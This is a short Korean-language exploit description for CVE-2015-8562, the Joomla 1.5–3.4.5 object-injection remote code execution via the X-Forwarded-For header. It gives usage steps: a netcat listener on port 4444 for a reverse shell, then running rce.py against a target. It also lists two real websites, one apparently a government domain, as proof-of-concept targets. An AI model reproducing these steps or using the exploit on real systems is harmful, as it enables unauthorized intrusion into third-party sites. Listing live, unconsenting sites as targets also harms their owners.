
Joomla 1.5 - 3.4.5 객체 주입 RCE X-Forwarded-For 헤더
익스플로잇: Joomla 1.5 - 3.4.5 객체 주입 RCE X-Forwarded-For 헤더:
취약점 날짜: 2015년 12월 17일
익스플로잇 작성자: anarc0der
버전: Joomla 1.5 ~ 3.4.5
CVE : CVE-2015-8562
사용 방법:
터미널 하나를 열고 nc로 리슨: $ nc -lnvp 4444
다른 터미널을 열고 익스플로잇 실행:
python3 rce.py --target='target' --ip='ip' --port=4444
PoC 대상 예시 (이들을 건드리지 마세요. 다른 사람들이 예시로 사용합니다):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/